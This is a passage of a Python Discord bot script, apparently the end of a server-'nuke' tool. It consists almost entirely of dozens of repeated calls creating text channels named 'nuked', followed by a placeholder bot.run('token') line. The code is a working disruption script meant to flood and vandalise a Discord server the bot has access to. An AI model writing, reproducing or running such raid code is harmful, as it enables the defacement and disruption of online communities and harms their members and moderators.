    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')




#auth token
bot.run ("token")
